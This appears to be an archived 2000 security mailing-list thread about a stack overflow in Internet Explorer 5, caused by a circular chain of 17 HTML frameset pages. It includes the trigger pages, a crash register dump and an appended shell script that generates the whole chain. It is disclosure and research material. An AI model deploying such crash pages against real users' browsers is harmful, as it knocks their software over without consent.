Vulnerability Development mailing list archives

Re: Stack Overflow in IE 5 (NT 4.0)


From: Erik Tayler <nine () 14x net>
Date: Tue, 15 Aug 2000 14:22:40 -0500

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I'm sure you've seen this, but decided to send.

IEXPLORE caused a stack fault in module MSHTML.DLL at 0167:70d1b842.
Registers:
EAX=00554030 CS=0167 EIP=70d1b842 EFLGS=00010206
EBX=80040104 SS=016f ESP=00554030 EBP=00554038
ECX=00551ce4 DS=016f ESI=004b3a7c FS=2d0f
EDX=00000000 ES=016f EDI=00000000 GS=0000
Bytes at CS:EIP:
85 01 8b e1 8b 08 8b 40 04 50 c3 00 00 00 53 6f
Stack dump:
70cfa920 70cfa268 00554068 70f52194 004e4e88 00000000 00000017
00000000 00000000 00000000 80040104 004f4864 00000000 00000000
00554090 70f52105

Erik Tayler
14x Network Security
http://www.14x.net

----- Original Message -----
From: "Sherrod, Andrew" <andrew.sherrod () TFN COM>
To: <VULN-DEV () SECURITYFOCUS COM>
Sent: Tuesday, August 15, 2000 10:59 AM
Subject: Stack Overflow in IE 5 (NT 4.0)


I am uncertain if this is exploitable, but it seems a possibility:

Create a web page as follows:

<HTML>
<HEAD>
<TITLE>
INFINITE FRAMES
</TITLE>
</HEAD>
<FRAMESET rows=80,20>
<FRAME src="b.html">
<FRAME src="http://www.yahoo.com">
</FRAMESET>
</HTML>

Save as "a.html".

Repeat, changing b to c and saving the page as "b.html".

Continue through "q.html", which refers not to "r.html", but back
to "a.html":

(Text of q.html):

<HTML>
<HEAD>
<TITLE>
INFINITE FRAMES
</TITLE>
</HEAD>
<FRAMESET cols=80,20>
<FRAME src="a.html">
<FRAME src="http://www.yahoo.com">
</FRAMESET>
</HTML>

(Some cursory tests suggest 17 frames as the minimum to produce the
overflow.)

This page will have no effect on Netscape, which loads frames up
through q.html, leaving an empty frame where a.html should be.

IE 5 does the same, but also creates two blank buttons on the task
bar and sometimes briefly creates a floating white square in the
upper left corner of the screen. It does not crash immediately, but
when a new URL is entered a stack overflow occurs.

I haven't had time to fully examine this, or see if there is a
means to exploit the overflow.

AGS

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBOZmYfk0pQlPl0B0AEQIuIwCgqf+g7nmDJWgqlAWfjRvv9sdRgRUAoICp
XooqNmQArWbMTQA8mQd34qoV
=GEmo
-----END PGP SIGNATURE-----
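The reproduction steps in Andrew Sherrod's post (17 frameset pages a.html through q.html, each framing the next and q.html framing a.html again) are tedious to build by hand. The script below is an added example, not part of either poster's message: it generates the whole circular chain so the behaviour can be retested against a browser of choice. The output directory, the page-count parameter and the helper names (letter, gen_frame_chain, frame_target) are assumptions of this example; the page layout, the rows/cols split and the count of 17 follow the post.

```shell
#!/bin/sh
# Added example: generate the circular frameset chain described in the post.
# a.html frames b.html, b.html frames c.html, ..., the last page frames a.html.
# Pages 1..n-1 use rows=80,20; the last page uses cols=80,20, as in the post.

# Map 1 -> a, 2 -> b, ... (assumption: at most 26 pages, as the post uses letters)
letter() {
    printf "\\$(printf '%03o' $((96 + $1)))"
}

# gen_frame_chain DIR [N]: write N pages into DIR (N defaults to 17, the
# minimum the post reports as triggering the overflow)
gen_frame_chain() {
    dir=$1
    n=${2:-17}
    mkdir -p "$dir"
    i=1
    while [ "$i" -le "$n" ]; do
        cur=$(letter "$i")
        if [ "$i" -lt "$n" ]; then
            nxt=$(letter $((i + 1)))
            layout="rows=80,20"
        else
            # last page closes the cycle back to the first page
            nxt=$(letter 1)
            layout="cols=80,20"
        fi
        cat > "$dir/$cur.html" <<EOF
<HTML>
<HEAD>
<TITLE>
INFINITE FRAMES
</TITLE>
</HEAD>
<FRAMESET $layout>
<FRAME src="$nxt.html">
<FRAME src="http://www.yahoo.com">
</FRAMESET>
</HTML>
EOF
        i=$((i + 1))
    done
}

# frame_target FILE: print the local page a generated frameset file points at,
# so the cycle can be checked without loading it in a browser
frame_target() {
    sed -n 's/.*<FRAME src="\([a-z]\.html\)".*/\1/p' "$1"
}

# Usage: gen_frame_chain ./infinite-frames 17 && frame_target ./infinite-frames/q.html
```

Serving the directory over plain HTTP or opening a.html from disk reproduces the load order the post describes; frame_target on each file confirms the chain closes at q.html -> a.html before any browser is pointed at it.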

